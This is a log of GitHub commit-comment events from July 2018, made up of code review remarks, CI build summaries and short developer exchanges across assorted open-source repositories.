{"id":"8025227483","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29850334,"position":40,"line":40,"path":"src/containers/Post/Post.js","commit_id":"12ebd9f0872362fcb336dab87161b7a5c69eddbc","created_at":"2018-07-26T21:08:25Z","updated_at":"2018-07-26T21:08:25Z","author_association":"NONE","body":"Тоже самое про деструктизацию, это везде, в методах, в лайфсайкл хуках, в рендере"}},"created_at":"2018-07-26T21:08:25Z"}
{"id":"8025228692","type":"CommitCommentEvent","actor":{"login":"ELanning"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29850336,"position":6,"line":6,"path":"components/help-box/component.jsx","commit_id":"1bce2dbccf6941c96c077782fe1d4afb0aa46b6b","created_at":"2018-07-26T21:08:42Z","updated_at":"2018-07-26T21:08:42Z","author_association":"NONE","body":"This component is missing the \"close\" x-icon and all functionality around that. We can add that later, but it's a somewhat important feature as most specs have it."}},"created_at":"2018-07-26T21:08:42Z"}
{"id":"8025228951","type":"CommitCommentEvent","actor":{"login":"benjaminapetersen"},"repo":{"name":"benjaminapetersen/js-lunch-and-learn"},"payload":{"comment":{"id":29850337,"position":null,"line":null,"path":null,"commit_id":"02259f42b6fa540aa04faa05b1549e77d4eb01f1","created_at":"2018-07-26T21:08:45Z","updated_at":"2018-07-26T21:08:45Z","author_association":"OWNER","body":"Also from our notes:\r\n\r\n```\r\nHTTP requests summary:\r\n  VERBS:\r\n    GET\r\n      - go get a list of data\r\n      - OR go get 1 data item (or a subset)\r\n    POST\r\n      - create a new\r\n    PUT\r\n      - update, with a whole new representation\r\n    PATCH\r\n      - update, with just the changed bit\r\n    DELETE \r\n      - remote an item \r\n\r\n\r\nUsing axios, this is basically what it looks like:\r\naxios.someHTTPVerb('some/string/address/to/a/location', {maybeAnObjectToSend}, {maybeSpecialInstructionsToo}).then((resp) => whatNext(), (err) => ohNoes());\r\n\r\naxios.get(fromWhere, how)\r\naxios.post(toWhere, whatThingToSave, how)\r\naxios.delete(toWhere, justTheId)\r\netc.\r\n```"}},"created_at":"2018-07-26T21:08:45Z"}
{"id":"8025230383","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29850341,"position":73,"line":73,"path":"src/containers/Post/Post.js","commit_id":"12ebd9f0872362fcb336dab87161b7a5c69eddbc","created_at":"2018-07-26T21:09:06Z","updated_at":"2018-07-26T21:09:06Z","author_association":"NONE","body":"Такое лучше выносить в отдельные компоненты"}},"created_at":"2018-07-26T21:09:06Z"}
{"id":"8025231037","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29850343,"position":270,"line":760,"path":"kstars/ekos/scheduler/schedulerjob.cpp","commit_id":"ff2d77075e66708cd7e9664fad3b96b1b01a16c3","created_at":"2018-07-26T21:09:15Z","updated_at":"2018-07-26T21:09:15Z","author_association":"NONE","body":"This one is difficult to transfer as is, because there is a part of calculation and a part of user feedback.\r\nBut I did the same in one of my branches, so I agree.\r\nWe should probably define an enum with some error codes, so that the Scheduler may understand why a particular job has an invalid state. No altitude higher than the minimum, things like that."}},"created_at":"2018-07-26T21:09:15Z"}
{"id":"8025237821","type":"CommitCommentEvent","actor":{"login":"majestrate"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29850352,"position":null,"line":null,"path":null,"commit_id":"6708654a6f1525634d3d0d769e6480567121a4fc","created_at":"2018-07-26T21:10:45Z","updated_at":"2018-07-26T21:10:45Z","author_association":"OWNER","body":"was for mingw build"}},"created_at":"2018-07-26T21:10:45Z"}
{"id":"8025241994","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29850360,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T21:11:41Z","updated_at":"2018-07-26T21:11:41Z","author_association":"COLLABORATOR","body":"anyways, did you see any unit tests, i wrote a number of them in the test i\nshared up, all of them pass without aspectj but initialisation fail with\nit, i can write an aspectj for context wrap and already want to but that\ndoes nothing to clearing the current issue being spring initialisation, if\nits the dependencies or class loading that has issues, then am better off\nof you could point to where are/is such problem(s)\n\nOn Fri, Jul 27, 2018 at 12:06 AM Wyclif Luyima <notifications@github.com>\nwrote:\n\n> The unit tests\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/e4317249e73da99bf34c4a78b8de9d71c96a6b88#commitcomment-29850303>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8rJPXVI43-iSyxrI_kHqC3v-S0Efks5uKi86gaJpZM4ViVWD>\n> .\n>\n\n\n-- \n\n*Kaweesi Joseph*\n\n*Jembi Health Systems NPC* *|  **Uganda*\n\n*Mobile: **+256784994313** | Office: **Software Developer** | Skype:*\n*kaweesi.joseph*\n*E-mail: kaweesi@jembi.org <kaweesi@jembi.org>*\n\n\n\n*This e-mail contains proprietary and confidential information some or all\nof which may be legally privileged. It is for the intended recipient only.\nIf an addressing or transmission error has misdirected this e-mail, please\nnotify the author by replying to this e-mail and then deleting same. If you\nare not the intended recipient you must not use, disclose, distribute,\ncopy, print or rely on this e-mail. Jembi Health Systems NPO, its\nsubsidiaries and associated companies is not liable for the security of\ninformation sent by e-mail and accepts no liability of whatsoever nature\nfor any loss, damage or expense resulting, directly or indirectly, from the\naccess of this e-mail or any attachments hereto.*\n"}},"created_at":"2018-07-26T21:11:41Z"}
{"id":"8025242949","type":"CommitCommentEvent","actor":{"login":"ELanning"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29850366,"position":17,"line":17,"path":"components/help-box/component.jsx","commit_id":"1bce2dbccf6941c96c077782fe1d4afb0aa46b6b","created_at":"2018-07-26T21:11:54Z","updated_at":"2018-07-26T21:11:54Z","author_association":"NONE","body":"It would be nice if this had support for different background colors, or other styling options. I'm sure different shades of blue, or font styles, etc might be wanted. I guess we can add that as needed, but it really is a hassle to import/update dependencies."}},"created_at":"2018-07-26T21:11:54Z"}
{"id":"8025243660","type":"CommitCommentEvent","actor":{"login":"la3lma"},"repo":{"name":"ostelco/ostelco-core"},"payload":{"comment":{"id":29850367,"position":5,"line":56,"path":".circleci/config.yml","commit_id":"a26e86e649f220e8e1a9e610048c590d5df62d6b","created_at":"2018-07-26T21:12:03Z","updated_at":"2018-07-26T21:12:03Z","author_association":"MEMBER","body":"Use explicit newline inside string instead \"\\n\"\r\n"}},"created_at":"2018-07-26T21:12:03Z"}
{"id":"8025246913","type":"CommitCommentEvent","actor":{"login":"kumar303"},"repo":{"name":"mozilla/addons-frontend"},"payload":{"comment":{"id":29850375,"position":17,"line":17,"path":"src/amo/client.js","commit_id":"b5f49aae9eeb05622ab5923e12e84eb42791f462","created_at":"2018-07-26T21:12:45Z","updated_at":"2018-07-26T21:12:45Z","author_association":"MEMBER","body":"oh, wait, I thought this patch was part of https://github.com/mozilla/addons-frontend/pull/5652 . Nevermind."}},"created_at":"2018-07-26T21:12:45Z"}
{"id":"8025265135","type":"CommitCommentEvent","actor":{"login":"timediv"},"repo":{"name":"timediv/docker-ucl-cluster"},"payload":{"comment":{"id":29850409,"position":10,"line":33,"path":"Dockerfile","commit_id":"2824752f905939ec8d5e85d81c741cea90448524","created_at":"2018-07-26T21:16:42Z","updated_at":"2018-07-26T21:16:42Z","author_association":"OWNER","body":"Often outdated, but surely an alternative"}},"created_at":"2018-07-26T21:16:42Z"}
{"id":"8025269049","type":"CommitCommentEvent","actor":{"login":"willdurand"},"repo":{"name":"mozilla/addons-frontend"},"payload":{"comment":{"id":29850418,"position":17,"line":17,"path":"src/amo/client.js","commit_id":"b5f49aae9eeb05622ab5923e12e84eb42791f462","created_at":"2018-07-26T21:17:36Z","updated_at":"2018-07-26T21:17:36Z","author_association":"MEMBER","body":"ah no sorry, that would have been too much (but hopefully, soon-ish you'll have the chance to review such a patch 🏅 )"}},"created_at":"2018-07-26T21:17:36Z"}
{"id":"8025273271","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29850426,"position":294,"line":784,"path":"kstars/ekos/scheduler/schedulerjob.cpp","commit_id":"ff2d77075e66708cd7e9664fad3b96b1b01a16c3","created_at":"2018-07-26T21:18:32Z","updated_at":"2018-07-26T21:18:32Z","author_association":"NONE","body":"I think this is a poor algorithm. We'll have to fix that using rise time and culmination time as offered by the almanach in the future..."}},"created_at":"2018-07-26T21:18:32Z"}
{"id":"8025274027","type":"CommitCommentEvent","actor":{"login":"ELanning"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29850428,"position":17,"line":17,"path":"components/help-box/component.jsx","commit_id":"1bce2dbccf6941c96c077782fe1d4afb0aa46b6b","created_at":"2018-07-26T21:18:42Z","updated_at":"2018-07-26T21:18:42Z","author_association":"NONE","body":"Also `showLightBulb` is an imperative verb"}},"created_at":"2018-07-26T21:18:42Z"}
{"id":"8025274641","type":"CommitCommentEvent","actor":{"login":"kamaljohnson"},"repo":{"name":"kamaljohnson/TReX-GAME"},"payload":{"comment":{"id":29850429,"position":10,"line":7,"path":"TypeRX_server/lobby/serializer.py","commit_id":"a72cc97688d8cdb347d153a8cbf5daa34d637255","created_at":"2018-07-26T21:18:50Z","updated_at":"2018-07-26T21:18:50Z","author_association":"OWNER","body":"Do we actually need this part or just the declarations used in the earlier commits enough"}},"created_at":"2018-07-26T21:18:50Z"}
{"id":"8025278128","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29850433,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-26T21:19:38Z","updated_at":"2018-07-26T21:19:38Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2915 of 2948 tests passed, 147 test warnings)\n\nMessages:\n\n * 149 tests had: ESO small diffs.\n * 141 tests had: EIO diffs.\n * 80 tests had: Table small diffs.\n * 107 tests had: MTR small diffs.\n * 26 tests had: ESO big diffs.\n * 22 tests had: MTR big diffs.\n * 28 tests had: Table big diffs.\n * 3 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 649\n * Failed: 4\n\nregression Test Summary\n * Passed: 595\n * Failed: 29\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.88%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T21:19:38Z"}
{"id":"8025278752","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29850436,"position":350,"line":840,"path":"kstars/ekos/scheduler/schedulerjob.cpp","commit_id":"ff2d77075e66708cd7e9664fad3b96b1b01a16c3","created_at":"2018-07-26T21:19:46Z","updated_at":"2018-07-26T21:19:46Z","author_association":"NONE","body":"This one is fine here too. Note how it doesn't care about min altitude or moon separation :)"}},"created_at":"2018-07-26T21:19:46Z"}
{"id":"8025283191","type":"CommitCommentEvent","actor":{"login":"ry"},"repo":{"name":"ry/deno"},"payload":{"comment":{"id":29850453,"position":null,"line":null,"path":null,"commit_id":"09317ff40d9515d8c7b478facf344106715a1108","created_at":"2018-07-26T21:20:48Z","updated_at":"2018-07-26T21:20:48Z","author_association":"OWNER","body":"sorry i forgot to link this https://gist.github.com/ry/297c83e0ac8722c045db1b097cdb6afc"}},"created_at":"2018-07-26T21:20:48Z"}
{"id":"8025288369","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29850459,"position":null,"line":null,"path":null,"commit_id":"ff2d77075e66708cd7e9664fad3b96b1b01a16c3","created_at":"2018-07-26T21:21:58Z","updated_at":"2018-07-26T21:21:58Z","author_association":"NONE","body":"A nice start I think. Sorry that the \"light frames required\" fix I pushed yesterday does a conflict in there.\r\nI think you should move by shorter jumps, one function at a time, pushed as a differential for Jasem to merge... Not easy. I'll continue to review."}},"created_at":"2018-07-26T21:21:58Z"}
{"id":"8025290604","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/Node-Blog"},"payload":{"comment":{"id":29850465,"position":null,"line":null,"path":null,"commit_id":"be64b99b209930b54c29be42b7ff13ec525f1610","created_at":"2018-07-26T21:22:30Z","updated_at":"2018-07-26T21:22:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Perform CRUD operations on users, posts, and tags.](https://trello.com/c/2NriioeA/2-perform-crud-operations-on-users-posts-and-tags)"}},"created_at":"2018-07-26T21:22:30Z"}
{"id":"8025290746","type":"CommitCommentEvent","actor":{"login":"serginij"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29850467,"position":73,"line":73,"path":"src/containers/Post/Post.js","commit_id":"12ebd9f0872362fcb336dab87161b7a5c69eddbc","created_at":"2018-07-26T21:22:31Z","updated_at":"2018-07-26T21:22:31Z","author_association":"OWNER","body":"Всю форму?"}},"created_at":"2018-07-26T21:22:31Z"}
{"id":"8025294573","type":"CommitCommentEvent","actor":{"login":"serginij"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29850474,"position":40,"line":40,"path":"src/containers/Post/Post.js","commit_id":"12ebd9f0872362fcb336dab87161b7a5c69eddbc","created_at":"2018-07-26T21:23:24Z","updated_at":"2018-07-26T21:23:24Z","author_association":"OWNER","body":"То есть в любом месте, где у меня используется пропс или стейт нужно юзать деструктизацию?"}},"created_at":"2018-07-26T21:23:24Z"}
{"id":"8025295160","type":"CommitCommentEvent","actor":{"login":"Himmelt"},"repo":{"name":"Himmelt/Quorra"},"payload":{"comment":{"id":29850475,"position":null,"line":null,"path":null,"commit_id":"c465c631e8b8e68540d4a95a3be9be0921e1c88c","created_at":"2018-07-26T21:23:32Z","updated_at":"2018-07-26T21:23:32Z","author_association":"OWNER","body":"fix #1 "}},"created_at":"2018-07-26T21:23:32Z"}
{"id":"8025326556","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29850549,"position":null,"line":null,"path":null,"commit_id":"fb54a3caf149f7e0434d6a490327efefb8b59f1a","created_at":"2018-07-26T21:30:47Z","updated_at":"2018-07-26T21:30:47Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 553](https://ci.hashicorp.engineering/viewLog.html?buildId=107260&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-26T21:30:47Z"}
{"id":"8025328399","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29850556,"position":null,"line":null,"path":null,"commit_id":"fb54a3caf149f7e0434d6a490327efefb8b59f1a","created_at":"2018-07-26T21:31:13Z","updated_at":"2018-07-26T21:31:13Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 553](https://ci.hashicorp.engineering/viewLog.html?buildId=107260&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 127 Build time: 00:00:24"}},"created_at":"2018-07-26T21:31:13Z"}
{"id":"8025328849","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29850557,"position":null,"line":null,"path":null,"commit_id":"fd38569fa7be50f0cddc03d6d77c19ec33bfa0c8","created_at":"2018-07-26T21:31:19Z","updated_at":"2018-07-26T21:31:19Z","author_association":"COLLABORATOR","body":"Documentation can now be run using `make doc` as of commit 95e66941e9e4a356f41b1581e86ad11083bdde3d from the Python subdirectory. "}},"created_at":"2018-07-26T21:31:19Z"}
{"id":"8025332792","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29850566,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-26T21:32:14Z","updated_at":"2018-07-26T21:32:14Z","author_association":"COLLABORATOR","body":"As of commit 95e66941e9e4a356f41b1581e86ad11083bdde3d, `make test` runs the test cases."}},"created_at":"2018-07-26T21:32:14Z"}
{"id":"8025333690","type":"CommitCommentEvent","actor":{"login":"timc13"},"repo":{"name":"schettino72/sqla_yaml_fixtures"},"payload":{"comment":{"id":29850568,"position":2,"line":1,"path":"CHANGES","commit_id":"89b1567d265a5eb6504f5cfceb9c8f34102ee2db","created_at":"2018-07-26T21:32:26Z","updated_at":"2018-07-26T21:32:26Z","author_association":"COLLABORATOR","body":"ahhh woops"}},"created_at":"2018-07-26T21:32:26Z"}
{"id":"8025335641","type":"CommitCommentEvent","actor":{"login":"vuinguyen"},"repo":{"name":"Minitex/Simplified-iOS"},"payload":{"comment":{"id":29850571,"position":null,"line":null,"path":null,"commit_id":"e6fcc08dbed98c4cdb5008ea053201a5ceed1da6","created_at":"2018-07-26T21:32:54Z","updated_at":"2018-07-26T21:32:54Z","author_association":"NONE","body":"In the code, the search icon is already shown by default for the catalog/feed. But there didn't seem to be a way to set the rightBarButtonItem of the navigation bar to nil (Tried it, didn't work) and refresh the navigation bar, if the feed wasn't searchable. \r\n\r\nThis person had the same problem as me:\r\nhttps://stackoverflow.com/a/25067590/967761\r\n\r\nso I did some variation of their solution. But instead of adding an empty bar button image, which is something I would have to create, just added a button with an empty title instead.\r\n\r\nI wasn't excited that the code had to be duplicated, depending on whether we have a grouped (multiple column) or ungrouped (single column) catalog feed, but refactoring the Catalog code to prevent code duplication is outside the scope of this issue: http://jira.nypl.org/browse/SIMPLY-1008\r\n\r\n"}},"created_at":"2018-07-26T21:32:54Z"}
{"id":"8025345047","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29850590,"position":13,"line":32,"path":"otus/app/module/participant/repository/participant-repository-service.js","commit_id":"96eb1f83c1a2530550f482f7e9e7b85e4648b913","created_at":"2018-07-26T21:35:02Z","updated_at":"2018-07-26T21:35:02Z","author_association":"MEMBER","body":"Esse já era o padrão deste serviço"}},"created_at":"2018-07-26T21:35:02Z"}
{"id":"8025345798","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29850594,"position":15,"line":34,"path":"otus/app/module/participant/repository/participant-repository-service.js","commit_id":"96eb1f83c1a2530550f482f7e9e7b85e4648b913","created_at":"2018-07-26T21:35:13Z","updated_at":"2018-07-26T21:35:13Z","author_association":"MEMBER","body":"idem\r\n"}},"created_at":"2018-07-26T21:35:13Z"}
{"id":"8025348461","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29850597,"position":null,"line":null,"path":null,"commit_id":"36111dcc1d3ee3bb189ac4527b370a937405c6eb","created_at":"2018-07-26T21:35:50Z","updated_at":"2018-07-26T21:35:50Z","author_association":"COLLABORATOR","body":"@Fourdee \r\nAhh yeah makes sense for DietPi-PREP this is necessary. Sorry didn't think about it 😅."}},"created_at":"2018-07-26T21:35:50Z"}
{"id":"8025353121","type":"CommitCommentEvent","actor":{"login":"sam6238"},"repo":{"name":"sam6238/Python"},"payload":{"comment":{"id":29850608,"position":null,"line":null,"path":null,"commit_id":"96e9489d750276c9126081191bc98bc3518f9123","created_at":"2018-07-26T21:36:50Z","updated_at":"2018-07-26T21:36:50Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-26T21:36:50Z"}
{"id":"8025354613","type":"CommitCommentEvent","actor":{"login":"rsmarples"},"repo":{"name":"rsmarples/openresolv"},"payload":{"comment":{"id":29850615,"position":null,"line":null,"path":null,"commit_id":"a694a49c41ffdc0e215320459af009d44482b065","created_at":"2018-07-26T21:37:10Z","updated_at":"2018-07-26T21:37:10Z","author_association":"OWNER","body":"getopts doesn't have to be present in the shell.\r\nIt's a required POSIX utility: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/getopts.html\r\n\r\nAlso, getopts isn't referenced in this commit...."}},"created_at":"2018-07-26T21:37:10Z"}
{"id":"8025356834","type":"CommitCommentEvent","actor":{"login":"sam6238"},"repo":{"name":"sam6238/Python"},"payload":{"comment":{"id":29850621,"position":null,"line":null,"path":null,"commit_id":"96e9489d750276c9126081191bc98bc3518f9123","created_at":"2018-07-26T21:37:40Z","updated_at":"2018-07-26T21:37:40Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-26T21:37:40Z"}
{"id":"8025362310","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29850637,"position":null,"line":null,"path":null,"commit_id":"8751fc2a5cd1aa582cd3228bfa950707a1b3e6cc","created_at":"2018-07-26T21:38:53Z","updated_at":"2018-07-26T21:38:53Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-291](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-291).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-291-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-26T21:38:53Z"}
{"id":"8025363061","type":"CommitCommentEvent","actor":{"login":"VipinAgarwal"},"repo":{"name":"hashicorp/terraform"},"payload":{"comment":{"id":29850638,"position":null,"line":null,"path":null,"commit_id":"e453f3c05a6b7fb8e25df378ee8827fca2d5ee24","created_at":"2018-07-26T21:39:04Z","updated_at":"2018-07-26T21:39:04Z","author_association":"NONE","body":"Looks like you have update the code, but your documentation still reflect the default value to false. "}},"created_at":"2018-07-26T21:39:04Z"}
{"id":"8025366813","type":"CommitCommentEvent","actor":{"login":"AlexInntekt"},"repo":{"name":"AlexInntekt/learningDjango2"},"payload":{"comment":{"id":29850648,"position":null,"line":null,"path":null,"commit_id":"3c705a8f058dc5d0f2a9c0287535c35d78bd9bd9","created_at":"2018-07-26T21:39:55Z","updated_at":"2018-07-26T21:39:55Z","author_association":"OWNER","body":"Import the module and retrieve the data using:  \r\n   queryset = RestaurantsLocation.objects.all()\r\n\r\nYou can send the data packet throug the context in the following way:\r\n\r\n   context = { \"objects_list\": queryset }\r\n   return render(request, template_name, context)"}},"created_at":"2018-07-26T21:39:55Z"}
{"id":"8025379778","type":"CommitCommentEvent","actor":{"login":"Vampire"},"repo":{"name":"Discord4J/Discord4J"},"payload":{"comment":{"id":29850692,"position":9,"line":175,"path":"build.gradle","commit_id":"94fe39be24f7c53a34bfdc13529fe3e4473c2382","created_at":"2018-07-26T21:43:01Z","updated_at":"2018-07-26T21:43:01Z","author_association":"NONE","body":"Why the explicit url anyway?\r\nIf it is because of the \"all\", you can simply do `distributionType = ALL` instead.\r\nAnd just in case you didn't know, you can simply leave out the version here and call it like `./gradlew wrapper --gradle-version 4.10` instead to update the distribution URL to the wanted version."}},"created_at":"2018-07-26T21:43:01Z"}
{"id":"8025383417","type":"CommitCommentEvent","actor":{"login":"avbdr"},"repo":{"name":"Mr-vero/F-Bootstrap-Form"},"payload":{"comment":{"id":29850703,"position":null,"line":null,"path":null,"commit_id":"82b7a64d9be59f791dc205cf9c3ba27ab40f5682","created_at":"2018-07-26T21:43:56Z","updated_at":"2018-07-26T21:43:56Z","author_association":"NONE","body":":) great fork!"}},"created_at":"2018-07-26T21:43:56Z"}
{"id":"8025386248","type":"CommitCommentEvent","actor":{"login":"danthonywalker"},"repo":{"name":"Discord4J/Discord4J"},"payload":{"comment":{"id":29850716,"position":9,"line":175,"path":"build.gradle","commit_id":"94fe39be24f7c53a34bfdc13529fe3e4473c2382","created_at":"2018-07-26T21:44:37Z","updated_at":"2018-07-26T21:44:37Z","author_association":"MEMBER","body":"Because when I run this command I just want it to work as intended without needing to pass in arguments."}},"created_at":"2018-07-26T21:44:37Z"}
{"id":"8025387395","type":"CommitCommentEvent","actor":{"login":"chaudhari31"},"repo":{"name":"rsmarples/openresolv"},"payload":{"comment":{"id":29850721,"position":null,"line":null,"path":null,"commit_id":"a694a49c41ffdc0e215320459af009d44482b065","created_at":"2018-07-26T21:44:54Z","updated_at":"2018-07-26T21:44:54Z","author_association":"NONE","body":"Sorry, I know this commit is not related to getopts but in my system I am using busybox 'sh' shell and I see 'script is giving error for getopts. I know getopts command is not required.\r\n\r\nWhen I use #!/bin/bash everything is working fine. I have tested with 'resolvconf -u' command only.\r\n\r\nDoes anything more required to run script with #!/bin/sh ?"}},"created_at":"2018-07-26T21:44:54Z"}
{"id":"8025388356","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"the-j0k3r/GitHub-Community-Dark"},"payload":{"comment":{"id":29850725,"position":null,"line":null,"path":null,"commit_id":"82e6e5d7881a3631271081c58f790ba882894fb7","created_at":"2018-07-26T21:45:09Z","updated_at":"2018-07-26T21:45:09Z","author_association":"NONE","body":"Updated... you can now use `npm run clean` to \"fix\" the css at 80 characters."}},"created_at":"2018-07-26T21:45:09Z"}
{"id":"8025391037","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29850730,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-26T21:45:48Z","updated_at":"2018-07-26T21:45:48Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-MacOS-10.9-clang: OK (2933 of 2948 tests passed, 11 test warnings)\n\nMessages:\n\n * 26 tests had: EIO diffs.\n * 13 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 10 tests had: Table small diffs.\n * 3 tests had: ERR diffs.\n * 13 tests had: ESO big diffs.\n * 14 tests had: Table big diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 608\n * Failed: 15\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.49%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T21:45:48Z"}
{"id":"8025392820","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29850739,"position":null,"line":null,"path":null,"commit_id":"2ce032051c8587b2017b1d2c40c7403f96411387","created_at":"2018-07-26T21:46:13Z","updated_at":"2018-07-26T21:46:13Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[1] Smaž aktivitu při přihlášených náhradnících](https://trello.com/c/ZRGUMVBH/660-1-sma%C5%BE-aktivitu-p%C5%99i-p%C5%99ihl%C3%A1%C5%A1en%C3%BDch-n%C3%A1hradn%C3%ADc%C3%ADch)"}},"created_at":"2018-07-26T21:46:13Z"}
{"id":"8025398124","type":"CommitCommentEvent","actor":{"login":"satazor"},"repo":{"name":"diegohaz/webpack-sort-chunks"},"payload":{"comment":{"id":29850751,"position":null,"line":null,"path":null,"commit_id":"278e1b6e9f5ae9d6d01800559a4ac9ac48b9ce76","created_at":"2018-07-26T21:47:32Z","updated_at":"2018-07-26T21:47:32Z","author_association":"CONTRIBUTOR","body":"Did you forgot to `npm publish`? It's not yet available in npm. :/"}},"created_at":"2018-07-26T21:47:32Z"}
{"id":"8025398390","type":"CommitCommentEvent","actor":{"login":"jgfoster"},"repo":{"name":"jgfoster/Jade"},"payload":{"comment":{"id":29850752,"position":null,"line":null,"path":null,"commit_id":"0af344b25645931c1a8260a5388f150d08706302","created_at":"2018-07-26T21:47:37Z","updated_at":"2018-07-26T21:47:37Z","author_association":"OWNER","body":"Actually, this was a fix for #167."}},"created_at":"2018-07-26T21:47:37Z"}
{"id":"8025401434","type":"CommitCommentEvent","actor":{"login":"jgfoster"},"repo":{"name":"jgfoster/Jade"},"payload":{"comment":{"id":29850762,"position":null,"line":null,"path":null,"commit_id":"0af344b25645931c1a8260a5388f150d08706302","created_at":"2018-07-26T21:48:22Z","updated_at":"2018-07-26T21:48:22Z","author_association":"OWNER","body":"Fix #167."}},"created_at":"2018-07-26T21:48:22Z"}
{"id":"8025407141","type":"CommitCommentEvent","actor":{"login":"diegohaz"},"repo":{"name":"diegohaz/webpack-sort-chunks"},"payload":{"comment":{"id":29850778,"position":null,"line":null,"path":null,"commit_id":"278e1b6e9f5ae9d6d01800559a4ac9ac48b9ce76","created_at":"2018-07-26T21:49:47Z","updated_at":"2018-07-26T21:49:47Z","author_association":"OWNER","body":"@satazor Yes, I forgot. Done. 😅"}},"created_at":"2018-07-26T21:49:47Z"}
